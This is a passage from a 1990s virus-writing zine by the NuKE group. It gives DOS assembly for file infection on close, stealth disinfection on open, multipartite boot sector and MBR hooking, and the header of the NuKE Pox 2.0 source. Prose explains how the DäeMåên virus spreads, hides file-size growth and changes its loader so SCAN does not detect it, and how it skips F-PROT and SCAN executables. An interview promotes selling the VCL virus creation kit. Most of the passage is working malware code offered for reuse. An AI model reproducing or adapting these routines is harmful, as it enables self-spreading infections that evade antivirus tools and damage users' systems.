                jnc     open_fuck1              ;No Error Continue         
                pop     ax                      ;restore                   
                iret                            ;Exit                      
                                                                           
open_fuck1:     push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     bx,ax                   ;BX=File handler           
                mov     ax,5700h                ;Get file TimeStamp        
                call    calldos21                                          
                                                                           
                mov     al,cl                   ;move seconds into al      
                or      cl,1fh                  ;Left just seconds         
                dec     cx                      ;60 Seconds                
                xor     al,cl                   ;cmp                       
                jnz     opening_exit3           ;NOT 60 seconds exit!      
                                                                           
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx  ;Save time Stamp        
                mov     word ptr cs:[old_date],dx  ;Save Date Stamp        
                                                                           
                mov     ax,4202h                ;Goto the End of File      
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                                                                           
                mov     cx,dx                   ;Save the filesize         
                mov     dx,ax                   ;we will need it later     
                                                ;to subtract the virus     
                push    cx                      ;size fromit...            
                push    dx                      ;Save it...                
                                                                           
Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header) 
in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at     
the VERY END! Since the buffer I made was 1B hex bytes, it is able to      
hold the EXE header or 3 .com bytes, anyhow the beginning of these         
bytes are the last 1B bytes, since its at the end... figure it out where   
you saved your 3 bytes or exe header for your virus, or use the Npox       
routine...                                                                 
                                                                           
                sub     dx,1Bh                  ;Subtract 1B bytes from    
                sbb     cx,0                    ;the filesize!             
                mov     ax,4200h                ;Now our pointer will      
                call    calldos21               ;point to the 1B bytes     
                                                ;Where the COM & EXE       
                                                ;original bytes are        
                push    cs                                                 
                pop     ds                      ;CS=DS (for exes)          
                                                                           
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                  ;1B bytes                  
                mov     dx,offset buffer        ;to our buffer             
                call    calldos21                                          
                                                                           
humm, now we got the original bytes, all we gotta do is write them         
back to the file's beginning...                                            
                                                                           
                xor     cx,cx                   ;Goto Beginning of File    
                xor     dx,dx                   ;                          
                mov     ax,4200h                                           
                call    calldos21                                          
                                                                           
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer        ;our buffer                
                mov     cx,1Bh                  ;1B bytes for EXEs         
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      open_exe_jmp            ;if EXE file jump          
                mov     cx,3h                   ;if COM write only 3 bytes 
open_exe_jmp:   call    calldos21                                          
                                                                           
We wrote the original file's data back to place, now we need to cut the    
virus off from the file, the virus is written at the end of the file,      
so all we do is set our file-pointer to EOF - Virus_Size, which gives      
us the original file length!                                               
                                                                           
                pop     dx                      ;EOF - Virus_Size          
                pop     cx                      ;to get ORIGINAL File size 
                sub     dx,virus_size           ;subtract virus size       
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                                                                           
Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, at  
our new ptr location, what we do it use does to crop it, by writing 0      
bytes to the new location, DOS will make that new location the NEW         
EoF and in result cutting off the virus and deleting its sector in the     
fat.                                                                       
                                                                           
                mov     ah,40h                  ;Write new EOF             
                xor     cx,cx                   ;Zero Bytes                
                call    calldos21               ;doit                      
                                                                           
                mov     cx,word ptr cs:[old_time]     ;Restore file time   
                mov     dx,word ptr cs:[old_date]     ;Restore file date   
                mov     ax,5701h                                           
                int     21h                                                
                                                                           
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
                                                                           
opening_exit3:  pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]     ;Return to DOS...         
                                                                           
ahh, the file is now Disinfected, now we safely return it to DOS and DOS   
may now open the file for inspection...                                    
                                                                           
                                Rock Steady/NuKE                           
===========================================================================
===========================================================================
                        ****************************                       
                        **  Infection on Closing  **                       
                        **                        **                       
                        **  By Rock Steady/NuKE   **                       
                        ****************************                       
This routine goes out for a few people that had trouble hacking this       
routine themselves... I kinda like it, its my very OWN, no Dark Avenger    
hack, it is VERY straight forward, and kinda simple...I was not going      
to put this here, but since I `Promised' people and left them hanging      
with `Wait for IJ#5, I guess I owed you it... huh?'                        
                                                                           
Again this code comes right out of Npox 2.0, its need, simple fast,        
cool, and it works, Npox is your example, I heard MANY MANY complaints     
with other `Virus writing guides' Meaning they explained the code but      
sometimes the arthur himself never check if the code was good, as he       
may have modified it, and not test it... or whatever reason... Anyhow      
                                                                           
------------------                                                         
Okay once you intercepted the Int21h/ah=3Dh function you make it jump      
here...                                                                    
                                                                           
closing_file:   cmp     bx,0h                   ;Handle=0?                 
                je      closing_bye             ;if equal leave            
                cmp     bx,4h                   ;Handle > 4                
                ja      close_cont              ;if YES ,then JUMP!        
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us  
                                                                           
The whole point of the above code is that DOS contains 5 predefined        
Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX          
COMx, LPTx handles... So we surely do not need to continue once we         
encounter that...                                                          
                                                                           
close_cont:     push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    di                                                 
                push    ds                                                 
                push    es                                                 
                push    bp                                                 
                                                                           
Our biggest problem is how do we know if this file is a .COM or .EXE or    
simply just another dumb data file? We need this info before we can        
try to infect it... We do this by getting DOS's "Lists of List" this       
will give us all INFO need on the File Handle Number we have in BX!        
and we do that like so...                                                  
                                                                           
                push    bx                      ;Save File Handle          
                mov     ax,1220h                ;Get the Job File Table    
                int     2fh                     ;(JFT)                     
                                                                           
This will give us the JFT for the CURRENT File handle in BX, which         
is given thru ES:DI Then we use this information to get the Address of     
the System File Table!                                                     
                                                                           
                mov     ax,1216h        ;Get System File Table (List)      
                mov     bl,es:[di]      ;system file table entry number    
                int     2fh                                                
                pop     bx              ;restore the Handle                
                                                                           
                add     di,0011h                                           
                mov     byte ptr es:[di-0fh],02h                           
                                                                           
                add     di,0017h                ;Jump to the ASCIIZ string 
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?        
                jne     closing_next_try        ;Next cmp...               
                cmp     byte ptr es:[di+2h],'M'                            
                jne     pre_exit                ;Nope exit                 
                jmp     closing_cunt3           ;.COM file continue        
                                                                           
closing_next_try:                                                          
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?        
                jne     pre_exit                ;No, exit                  
                cmp     byte ptr es:[di+2h],'E'                            
                jne     pre_exit                ;No, exit                  
                                                                           
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when      
started up, Opens itself, closes itself, etc... So that a dumb             
virus will infect it, and then the CRC value changes and F-PROT            
screams... haha... Fuck-Prot! is the name...                               
                                                                           
closing_cunt:   cmp     word ptr es:[di-8],'CS'                            
                jnz     closing_cunt1              ;SCAN                   
                cmp     word ptr es:[di-6],'NA'                            
                jz      pre_exit                                           
                                                                           
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                            
                jnz     closing_cunt2              ;F-PROT                 
                cmp     word ptr es:[di-6],'RP'                            
                jz      pre_exit                                           
                                                                           
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                            
                jnz     closing_cunt3                                      
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                  
                jnz     closing_cunt3                                      
                                                                           
pre_exit:       jmp     closing_nogood                                     
                                                                           
The REST is pretty much the EXACT same on `how' you'd infect a normal      
file, I'll leave it for you to go thru it... The hardest part is           
OVER! Only trick part is, the ending... Remember to Close the file         
and then do an IRET, you don't leave control to dos, as you only needed    
to close it, so do it... OR DON'T close it and return to DOS, as dos       
will close it, just DON'T CLOSE IT TWICE!!!!                               
                                                                           
closing_cunt3:  mov     ax,5700h                        ;Get file Time     
                call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                              ;60 Seconds        
                xor     al,cl                                              
                jz      closing_nogood                  ;Already infected  
                                                                           
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx       ;Save time         
                mov     word ptr ds:[old_date],dx                          
                                                                           
                mov     ax,4200h                        ;jmp beginning of  
                xor     cx,cx                           ;file...           
                xor     dx,dx                                              
                call    calldos21                                          
                                                                           
                mov     ah,3fh                          ;Get first 1b byte 
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                                                                           
                jc      closing_no_good                 ;error?            
                mov     ax,4202h                        ;Jmp to the EOF    
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                                                                           
                jc      closing_no_good                                    
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?        
                je      closing_exe                     ;Yupe then jmp     
                mov     cx,ax                                              
                sub     cx,3h                                              
                mov     word ptr ds:[jump_address+1],cx  ;Figure out the   
                call    infect_me                        ;jmp for .com     
                                                                           
                jc      closing_no_good                                    
                mov     ah,40h                          ;Write it to file  
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
closing_no_good:                                                           
                mov     cx,word ptr ds:[old_time]       ;Save file time    
                mov     dx,word ptr ds:[old_date]       ;& date            
                mov     ax,5701h                                           
                call    calldos21                                          
                                                                           
closing_nogood: pop     bp                                                 
                pop     es                                                 
                pop     ds                                                 
                pop     di                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
                                                                           
AS you see the above, we DIDN'T close the file, so we leave dos to do it.  
The bottom is for infecting .exes...                                       
                                                                           
closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original 
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP     
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                                                                           
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      closing_no_good                                    
                                                                           
                add     ax,virus_size                                      
                adc     dx,0                                               
                                                                           
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                                                                           
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                                                                           
                mov     bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                                                                           
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      close_split                                        
                inc     dx                                                 
close_split:    pop     cx                                                 
                pop     bx                                                 
                                                                           
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                                                                           
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
                                                                           
closing_over:   jmp     closing_no_good                                    
                                                                           
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Infection Routine...                                   
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
infect_me       proc                                                       
                mov     ah,40h                                             
                mov     dx,offset init_virus                               
                mov     cx,virus_size                                      
                call    calldos21                                          
                                                                           
                jc      exit_error                      ;Error Split       
                mov     ax,4200h                                           
                xor     cx,cx                           ;Pointer back to   
                xor     dx,dx                           ;Top of file!      
                call    calldos21                                          
                                                                           
                jc      exit_error                      ;Split Dude...     
                clc                                     ;Clear carry flag  
                ret                                                        
exit_error:                                                                
                stc                                     ;Set carry flag    
                ret                                                        
infect_me       endp                                                       
===========================================================================
===========================================================================
Multipartite Infection                                                     
~~~~~~~~~~~~~~~~~~~~~~                                                     
                                                                           
OK, you've seen them floating around... these whiz-bang you-bewt mongrel   
viruses which never seem to go away, even after you disinfect every file   
in existence... Huh... How the fuck did that come back?! Well it's really  
quite simple, and I'm sure not all of you out there are complete idiots.   
The fact is that the virus isn't even in any files! ...It's hiding in      
the partition table, or the boot sector!                                   
                                                                           
There are only a few viruses out there with the capability for             
multipartite infection, or "boot/file virus". Tequila, Anthrax and         
Invader are a few examples. My own creation, DäeMåên, is another, going    
a step further than any other boot/file virus has ever gone before, by     
infecting almost everything possible.                                      
                                                                           
The principle is VERY simple, in fact I kicked myself when I worked out    
a way to do it. The idea is simple, and it's the very same principle       
employed in any other TSR method... to hook interrupt 21h (DOS). This is   
fine. BUT the only hitch is that DOS automatically overwrites the old      
vector when it loads! So there's no point hooking it as soon as your       
code loads up off the disk. So what can we do?                             
                                                                           
We will obviously have to wait for DOS to change the interrupt, so we      
can hook it. But there's one problem! Other stupid programmers were        
being selfish and change the i21 pointer as a marker so that they can      
tell if it's been changed... like Invader puts in a -1 in the IP value of  
int 21h... so if something like DaeMaen is also on the sytem, it thinks    
it's DOS changing the pointer, hooks it and crashes the entire system...   
                                                                           
The way I waited for the pointer to change was to hook interrupt 13        
TWICE! (huh?) Pretty simple. What I did was have my int-check routine      
hooked onto i13 first, then my i13 handler over the top. The reason why    
you can't have it the other way is that in case another "program" hooks    
i13 over the top, and you can't disable your int-check routine... so       
it'll keep re-hooking and fuck up the system. (You could do it with        
flags, but I try and use as few flags as possible to keep code size down   
to a minimum).                                                             
                                                                           
At boot-up, the program checks to see if it's already TSR (via an          
illegal call to some interrupt, and checking the return code) and if it    
isn't, it steals some memory (something F-Prot and friends can pick up,    
but who gives a fuck, plus I can get around that now...<hehe>), hooks      
int 13h with the int-check routine, hooks it again with our i13 handler,   
then save the current interrupt 21h vector.  On every disk call, it        
compares the value of i21 with the saved value... if it's different, the   
int-check routine hooks it and then change the vector that our int 13h     
handler calls, so it no longer calls our int-check routine but goes        
straight to the real i13.                                                  
                                                                           
That's the essentials of boot/file management. Anyhow, here's the code     
to do what I just said, as it appears in the source code of DäeMåên...     
                                                                           
new13_2:        ; the guts of multipartite infection                       
                ; check to see if i21 has changed... if so, hook it        
                call save                       ; save registers           
                push cs                                                    
                pop es                                                     
                xor ax, ax                                                 
                mov ds, ax                                                 
                mov si, 21h*4                                              
                mov di, offset oldvect+8                                   
                cld                                                        
                cmpsw                                                      
                je nochange                                                
                cmpsw                                                      
                je nochange                                                
                call capture_21                                            
                push cs                                                    
                pop ds                                                     
                mov si, offset oldvect+0        ; copy over other ptr so   
                lea di, [si+4]                  ; that our i13 doesn't call
                movsw                           ; here any more [i21 has   
                movsw                           ; been hooked]             
nochange:       call restore                    ; restore registers        
                jmp dword ptr cs:[oldvect+0]                               
                                                                           
                                                                           
This method can be used on either floppy boot sector infection or the HD   
partition table infection.                                                 
                                                                           
As with many of my routines, stuff which took many other virus writers a   
few pages of code took me one page... that's not bad! I have many other    
goodies up my sleeve, like a 387-byte generic COM/EXE parasitic infector   
on execution, the smallest of its kind in the WORLD... (with room for      
improvement!).                                                             
                                                                           
Anyway, next InfoJournal will include the source codes to two of my        
prerelease Mutation Engines, both of which are fully functional in their   
own right. They have evolved far beyond my dreams, and I hope to have      
the world's best mutation engine finished by the end of February/March.    
(but it can't be the best at everything, but it sure generates a bucket    
fuckload of arcane bullshit instructions.  Heuristical nightmare...)       
                                                                           
Anyway, have fun screwing around with this little piece of research        
material...                                                                
                                                                           
                        TäLöN/NuKE                                         
===========================================================================
===========================================================================
DäeMåên Virus                                                              
~~~~~~~~~~~~~                                                              
                                                                           
This virus took me a while to write (about two weeks), because I was       
writing a lot of it for the first time. Some of the code is a bit          
overboard, like I don't think the SYS entry has to be quite that complex   
in order to work... but never mind. At least it works and it's quite       
well-behaved.                                                              
                                                                           
This virus is my first boot/file virus, and that also works perfectly.     
I worked all my own routines from scratch (my virus collection is          
extremely small, and I don't want to be influenced by other                
implementations unless they're better).                                    
                                                                           
It infects both floppy boot sectors, moving the original boot sector to    
the 5th last sector of the disk and writing the virus code on the last     
four. It also infects the Master Boot Record (partition table) on the      
first physical hard disk. Booting off an infected floppy will infect       
the MBR, as will the execution of an infected file. However, trying to     
read the partition table results in the redirection of the call,           
resulting in the original partition table (prior to infection) being       
read/written.                                                              
                                                                           
Floppies are infected on read/write access, and won't be infected if the   
drive is still spinning (ie. no disk change). It will take the boot        
sector and use the BPB to calculate the last sectors of the disk, no       
matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk.   
It makes sure it's a valid BPB by checking the OEM name to see if it's     
valid alphanumeric characters, but I was a bit selfish in that I overwrite 
the last word of OEM to mark infection.                                    
                                                                           
Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be   
infected on every possible file handle access I could find, ie. they       
will be infected on Open (3D), Close (3E), Attrib Change (43), Execution   
(4B), Handle Rename/Move (56), and Extended Open (6C). It manages to       
infect on file close by recording the filename by intercepting Create      
(3C) call, and the handle if it was created successfully.                  
                                                                           
If resident off infected file, it will not hook int 13h directly,          
instead searching segment 70h for DOS's call to the original interrupt     
handler, then putting our address in there instead and using the old       
address for our calls. It would have been possible to search the ROM       
BIOS for the correct handler, but that would circumvent future             
generations of boot/file viruses.                                          
                                                                           
DäeMåên employs a small decryption algorythm, however it is not variable   
mutation, since a few registers have to be saved in order for the SYS      
infection to work. The code is thoroughly encrypted, and McAfee and        
friends will have to write a new disinfection engine for this baby.        
However, disk infections are not encrypted, although it would have been    
easily done.                                                               
                                                                           
The routine to load the virus off the disk has been altered to avoid       
detection as Generic Boot Sector/Generic Partition virus. The changes      
are trivial, and it makes it look as if I don't know what I'm doing.       
The fact that I'm avoiding detection isn't readily apparent. Here is       
a code comparison, take a look for yourself.                               
                                                                           
        Generic                    DäeMåên                                 
     mov si, 413h               mov si, 412h                               
     sub word ptr [si], 3       add word ptr [si+1], -3         ; take 3k  
     int 12h                    lodsb                                      
                                lodsw                                      
     mov cl, 6                  mov cl, 6                                  
     shl ax, cl                 shl ax, cl                                 
     mov es, ax                 mov es, ax                                 
     xor bx, bx                 xor bx, bx                                 
                                                                           
The one on the left will be detected by SCAN, the one on the right will    
not. The differences are trivial. SCAN is such a stupid program, it's      
just ridiculous that millions of PC users rely on it utterly for total     
virus protection. That's great...                                          
                                                                           
DäeMåên is partially selective in which files it infects. Firstly, it      
will scan the filename for the characters SC, VS, CL and F-, which         
excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and       
F-PROT.                                                                    
                                                                           
Nor will it infect programs which have internal overlays. This is a        
great advantage since people running WinDoze won't have their favourite    
XYZ program fuck up because a virus infected it. DäeMåên simply will       
not infect programs with internal overlays. Here is the code to detect     
them:                                                                      
                                                                           
chkovl:         call file_end                                              
                push ax                       ; check for internal overlays
                push dx                                                    
                mov ax, word ptr [page_cnt]                                
                mov cx, 512                                                
                mul cx                                                     
                pop cx                                                     
                pop bp                                                     
                cmp ax, bp                                                 
                jb done                                                    
                cmp dx, cx                                                 
                jb done                                                    
                [...]                                                      
done:           ret                                                        
                                                                           
Pretty simple routine, huh?                                                
                                                                           
The beauty of this beast is that one small mistake, like trying to boot    
an infected disk by accident, or perhaps running an infected file, is      
that next time you boot up your system, EVERY file in your CONFIG.SYS,     
AUTOEXEC.BAT and everything henceforth will become infected! It is very    
easy to expose a large number of files to the virus in a very short        
space of time. Again, SCAN will probably help the spread of this virus     
immensely, by stupid users scanning their HD habitually, with the virus    
in memory... of course, EVERY file will then be infected.                  
                                                                           
As if that weren't enough for one virus, DäeMåên will also hide the        
increase of file size on the DOS directory. However, like most other       
viruses which employ this stealth method, CHKDSK will not report any       
allocation errors on these files. File size increase will be only 2048     
bytes, or 4096 bytes for SYS files. It will account for the different      
increase of the SYS.                                                       
                                                                           
To hide the increase, DäeMåên employs a little-exploited method, which     
is by adding 100 years to the date of the file. This way, other            
over-exploited methods (like setting the seconds field to a certain        
value) will not interfere with DäeMåên's stealth operation, and            
vice-versa.                                                                
                                                                           
DäeMåên also includes a number of text strings:                            
                                                                           
        "[DäeMåên] by TäLöN-{NûKΣ}"                     25 bytes           
        "Hugs to Sara Gordon"                           19 bytes           
        "Hey John! If this is bad, wait for [VCL20]!"   43 bytes           
        "For Dudley"                                    11 bytes           
        "[VCL20ß]/TäLöN"                                15 bytes           
                                                total  113 bytes           
                                                                           
(That stuff about VCL20ß is ßogus, just to make McAsshole shit his         
pants. But AV researchers be warned: a fair few of the routines            
contained in DäeMåên will also appear in VCL 2.0, like the boot/file       
infect capability!)                                                        
                                                                           
Virus Length   = 2048                                                      
Message Length =  113                                                      
...Code Length = 1935 bytes!!!                                             
                                                                           
Totally unheard of!                                                        
                                                                           
I seriously doubt anybody can beat that, at least not for a while yet.     
                                                                           
For a quick rehash of what this virus does...                              
                                                                           
COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a      
mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck   
up her description of this virus, she is so pathetically brain-dead.       
                                                                           
Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR        
INFECTOR coming soon to a computer installation near you!  From TäLöN of   
course!  And another one minus the polymorphism, under 800 bytes!          
                                                                           
Have fun!  And good night, John!                                           
                                                                           
                        TäLöN/NuKE                                         
===========================================================================
===========================================================================
Sunday Telegraph Interview                                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~                                                 
                                                                           
Well, about a month ago a NuKE associate received a call from a female     
reporter named Barbara Lewis; it was not our first, and surely not our     
last. Nevertheless, the topic she arose was quite interesting! We have     
the complete conversation with our NuKE member and Barbara Lewis.          
                                                                           
For those that need more info, Barbara Lewis is an English reporter for    
the _Sunday Telegraph_ in the United Kingdom. The article should           
also be published in the _New York Times_, and I guess we will pin it up   
with the others now. Anyhow the conversation...                            
                                                                           
Barbara> Beep-Bop-Beep-Dot-Beep-Beep-Bop. [Dials the number...]            
Nuke   > Hello?                                                            
                                                                           
Barbara> Yes, I'm looking for "Joseph Greco," as I am a reporter, Barbara  
         Lewis, for the _Sunday Telegraph_ in London. Is he there?         
Nuke   > This is he, how can I help you. [The old charms.]                 
                                                                           
Barbara> I am writing an article on virus groups and related underground   
         activities, I received this number from a friend telling me I     
         could get some information from you.                              
Nuke   > What do you wish to know, and I will see if I can help you.       
                                                                           
Barbara> I wish to know about the virus writers, why do they write such    
         programs? What do they find from these malicious programs?        
Nuke   > I believe you have the concept all messed up. Speaking on the     
         behalf of NuKE members we find that producing perhaps the         
         most technological advanced virus to exist, will if chance help   
         the AV (anti-virus) community to develop a standard or perhaps    
         a minimum of what their packages should do, as if it is capable   
         of the most advanced virus then getting the others is no problem. 
         Also, we see today that the anti-virus community are trying to    
         pull a suppression over all the computer users, and terrorize     
         them with this bad thing called a virus. Of course this method    
         is simply for the fact of increasing sales of their AV product,   
         which in turn is described to perform miracles when it comes      
         to virus protection. We have all heard about the well known       
         SCAN by McAfee, we have succeed in removing all their virus       
         strings and have found that there was only 850 of them, and       
         doesn't SCAN boast 1700+ viruses? Perhaps he has a copy of        
         every virus twice? Who knows!                                     
                                                                           
Barbara> So you say that you are helping out the AV community?             
Nuke   > Well, not really, our basic idea is to help YOU, the average      
         computer user that is dumb on computer structures and uses        
         these software packages to only later find out he was raped,      
         raped out of his data and his money. I'll give you an example.    
         F-Prot is heard to be a great anti-viral kit, and that it can     
         stop many viruses at its tracks, unknown and known. Inside the    
         F-Prot kit there is a program called VIRSTOP, it is a TSR program 
         that will check every file you run for infection etc... Now who   
         would expect that VIRSTOP only detects 800 viruses, NOT MORE!     
         And the strings are cheap works that would lose all credit for    
         Frisk and his package if "word got out!" Lemme tell you, the      
         well-known encryption engines like MtE are NOT detected by        
         VIRSTOP! It is not a miss in code, Frisk NEVER put the damn       
         routine inside, it is incapable to detect any polymorphic virus   
         that has infected the system! You have just succeeded into        
         screwing yourself just as McAfee did with SCAN!                   
         See, we are here to show you the facts, many people are not       
         able to disassemble and look through the code and find out what   
         the  virus package can detect! So we bring this information out   
         to the public, all I say is TRUE and can be backed up with the    
         proof I found inside these AV programs!                           
                                                                           
Barbara> What about the virus writers wanting to cause damage?             
Nuke   > Again that is why we are here, if you produce you a virus that    
         is unbelievable, the advances in the scanners will increase by    
         learning from our viruses, and the chances of a 14-year-old       
         wanting to create a virus for revenge or whatever reason          
         cannot compete with this and their virus become a failure,        
         which is exactly what we want! And we too do not enjoy those      
         "kids" that enjoy damage, we run this organization legally and    
         seriously. If we do find such a user within our circle surely     
         he will be made an example of.                                    
                                                                           
Barbara> There has been a group of teenagers in England that were virus    
         writers and called themselves ARCV, they have been arrested as    
         of Feb 8th, 1993 and are going on trail for creating viruses.     
         What do you think of this?                                        
Nuke   > Yes, ARCV, I knew them well. In this case I CANNOT say that I     
         am happy to see them arrested, you see many of there viruses      
         have been found and related to VCL/MPC generators. See, VCL is    
         a friendly user kit standing for Virus Creation Laboratory, all   
         one has to do is flag on the option he/she would want with his    
         dandy mouse and once done hit compile and the kit will produce    
         you the virus you asked it to do. Now are we going to put some-   
         one on trial for simply using such a program? Are we going to     
         introduce laws that make it illegal to run certain programs in    
         YOUR OWN computer? I find that a laugh! They certainly can not    
         be responsible!                                                   
                                                                           
Barbara> Then whom are we going to made responsible for these acts?        
Nuke   > Tough question, well I certainly do not believe that ARCV is.     
         I know several whom have used the VCL kit to generate viruses     
         to test how effective their anti-virus program was. This person   
         created the virus, in order to test them, should he be arrested   
         and tried? How do we know if a "bullet-proof" vest can withstand  
         a bullet? Naturally we test it! Also I find you are loosing       
         touch with the real issue! A virus is nothing but a program, it   
         can not be created by itself, it will do exactly what the         
         creator wanted it to do! Nothing more or less. ARCV's virus never 
         contain any DAMAGING CODE, they were viruses with little messages 
         and all... Wouldn't you say the guilty person is the one that     
         intensionally or carelessly created the virus for the produce to  
         cause havoc? The maker of a gun is not responsible for all the    
         murders but those that use it for that intension are.             
                                                                           
Barbara> You seem to know a lot on what is happening on this topic, may I  
         ask to what organization you belong to?                           
Nuke   > Sure, we called ourselves "NuKE" we are an international group,   
         ranging from Canada, USA, Australia, Europe. We are highly        
         organized, much more than what anybody would expect! We monitor   
         the virus and AV scene, not many would know it, but we do. We are 
         the makers of VCL which was the first of its kind, and STILL IS,  
         the ONLY virus kit to fully create your unique virus, many like   
         MPC consist on one virus which is broken up, we provide options as
         adding you own feature or choose any 24 we have. We will be       
         releasing a VCL v2.0 to be again the FIRST of its kind surpassing 
         anything out there, it may "boggle" the world, but it will set    
         new standards and pave new methods of virus scanning, it will     
         unfortunately kill the little guys, by in this world you have to  
         be very competitive. The VCL kit will perhaps be marketed, if you 
         wish you may even buy an advance copy when it comes out within    
         a month!                                                          
                                                                           
Barbara> Sounds interesting, what is the price range?                      
Nuke   > Humm...I guess 75$-100$ (US)                                      
                                                                           
Barbara> I'll leave you my number, +44-XX-XXX-XXXX. Call me when this      
         program is available.                                             
Nuke   > K0ol...Will do...     [Wow a date already?]                       
                                                                           
Barbara> I thank you for you time, and good day.    [Mush]                 
Nuke   > Okay now taw-taw...                        [English humour]       
                                                                           
                        The NuKE Associates                                
===========================================================================
;==========================================================================
;                        ** NuKE Pox v2.0 **                               
;This is VERY old code but I promised to give it out, you'll see it exactly
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to 
;see, and understand it! I don't care if you fuck with it, go for it!      
;The method of TSR is old, method of getting the Vectors is bad, the way   
;I infect EXEs ain't too hot... But hell it works! It infects overlays..   
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or 
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
;                                                                          
;And to all those that said I `Hacked' this...                             
; FFFFFF UU   UU   CCCC   KK  KK       YY    YY   OOOO   UU   UU           
; FF     UU   UU  CC  CC  KK KK         YY  YY   OO  OO  UU   UU           
; FFFF   UU   UU  CC      KKK      ===    YY     OO  OO  UU   UU           
; FF     UU   UU  CC  CC  KK KK           YY     OO  OO  UU   UU           
; FF      UUUUUU   CCCC   KK  KK          YY      OOOO    UUUUUU           
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are  
;500% better than this one...                                              
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;-*      (c) Rock Steady, Viral Developments                             -*
;*-      (c) NuKE Software Developement  1991, 1992                      *-
;-*                                                                      -*
;*-  Virus: NuKE PoX              Version: 2.0                           *-
;-*  ~~~~~~                       ~~~~~~~~                               -*
;*-  Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine.    *-
;-*         Will Disinfect files that are opened, and re-infect them     -*
;*-         when they are closed! Executed files are disinfected then    *-
;-*         executed, and when terminated reinfected!                    -*
;*-         VERY HARD to stop, it goes for your COMMAND.COM! beware!     *-
;-*         It is listed as a COMMON Virus due to is stealthiness!       -*
;*-  Bytes: 1800 Bytes                                                   *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
virus_size      equ     last - init_virus       ;Virus size                
mut1            equ     3                                                  
mut2            equ     1                                                  
mut3            equ     103h                    ;Offset location           
                                                                           
seg_a          segment   byte public                                       
               assume    cs:seg_a, ds:seg_a                                
                org     100h                    ;COM file!                 
rocko           proc    far                                                
start:          jmp     init_virus                                         
